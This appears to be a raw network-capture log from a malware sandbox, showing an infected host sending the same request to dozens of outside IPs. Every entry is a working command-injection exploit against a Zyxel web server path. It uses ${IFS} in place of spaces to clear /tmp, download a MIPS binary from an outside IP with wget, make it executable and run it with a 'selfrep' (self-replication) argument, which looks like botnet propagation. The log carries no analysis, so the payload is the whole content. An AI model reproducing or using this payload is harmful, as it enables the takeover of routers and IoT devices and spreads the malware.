                                            Jan 14, 2024 15:50:58.825117111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9505192.168.2.2341530126.250.204.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.825123072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9506192.168.2.235879481.12.98.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.825174093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9507192.168.2.2356908108.28.128.8443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.825197935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9508192.168.2.233654663.128.252.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.825237036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9509192.168.2.2347400143.113.53.80443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.825270891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9510192.168.2.2333394179.99.135.208443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.825354099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9511192.168.2.236034831.113.28.128443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.825370073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9512192.168.2.2360494203.15.241.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.825413942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9513192.168.2.233309869.116.162.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.825439930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9514192.168.2.2340792207.233.60.179443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.825514078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9515192.168.2.23413069.202.202.164443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.825522900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9516192.168.2.23591165.156.84.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.825556040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9517192.168.2.2335096103.243.172.90443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.825577021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9518192.168.2.233458482.194.226.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.825628042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9519192.168.2.2352798204.78.208.145443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.825659990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9520192.168.2.23594288.201.220.41443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.825715065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9521192.168.2.2335042129.209.119.168443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.825761080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9522192.168.2.234550624.8.8.90443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.825829983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9523192.168.2.234965099.246.123.78443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.825875998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9524192.168.2.2353728130.81.152.212443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.825930119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9525192.168.2.2333996114.244.175.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.825989962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9526192.168.2.2352662108.56.56.205443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.826041937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9527192.168.2.235547094.213.4.26443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.826076984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9528192.168.2.2348810117.39.250.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.826124907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9529192.168.2.235654664.131.11.72443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.826174021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9530192.168.2.235393877.220.126.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.826210976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9531192.168.2.2341088193.55.55.117443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.826268911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9532192.168.2.235782288.233.111.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.826286077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9533192.168.2.2355688152.100.241.52443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.826319933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9534192.168.2.2336856168.53.194.34443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.826410055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9535192.168.2.2359444204.49.194.61443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.826410055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9536192.168.2.23357022.128.111.2443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.826448917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9537192.168.2.2335492197.19.65.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.826471090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9538192.168.2.2350768196.110.114.121443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.826538086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9539192.168.2.235126852.87.11.38443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.826579094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9540192.168.2.2343172172.236.145.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.826600075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9541192.168.2.234049686.26.22.212443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.826647043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9542192.168.2.2340778176.167.114.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.826673985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9543192.168.2.235314092.167.243.208443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.826713085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9544192.168.2.2343442109.195.157.75443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.826761007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9545192.168.2.2342144101.145.164.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.826809883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9546192.168.2.233729818.17.91.128443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.826829910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9547192.168.2.2351494126.7.79.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.826884985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9548192.168.2.234236454.65.202.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.826913118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9549192.168.2.234921871.22.192.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.826968908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9550192.168.2.233369827.189.80.210443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.827012062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9551192.168.2.2343986123.31.163.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.827025890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9552192.168.2.2344734105.81.198.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.827081919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9553192.168.2.235992480.44.183.225443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.827161074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9554192.168.2.233893896.87.178.172443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.827192068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9555192.168.2.233329259.200.115.163443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.827241898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9556192.168.2.2345376217.180.154.214443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.827276945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9557192.168.2.23429184.171.226.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.827316046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9558192.168.2.233999432.32.152.115443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.827373981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9559192.168.2.234279025.9.214.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.827425957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9560192.168.2.235771253.208.168.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.827457905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9561192.168.2.2347168169.18.156.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.827481031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9562192.168.2.234468420.24.118.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.827560902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9563192.168.2.234690265.102.170.94443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.827606916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9564192.168.2.2342214109.143.77.204443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.827629089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9565192.168.2.2355094139.8.164.110443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.827658892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9566192.168.2.2357326122.211.126.189443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.827685118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9567192.168.2.234202697.164.51.26443
                                            TimestampBytes transferredDirectionData
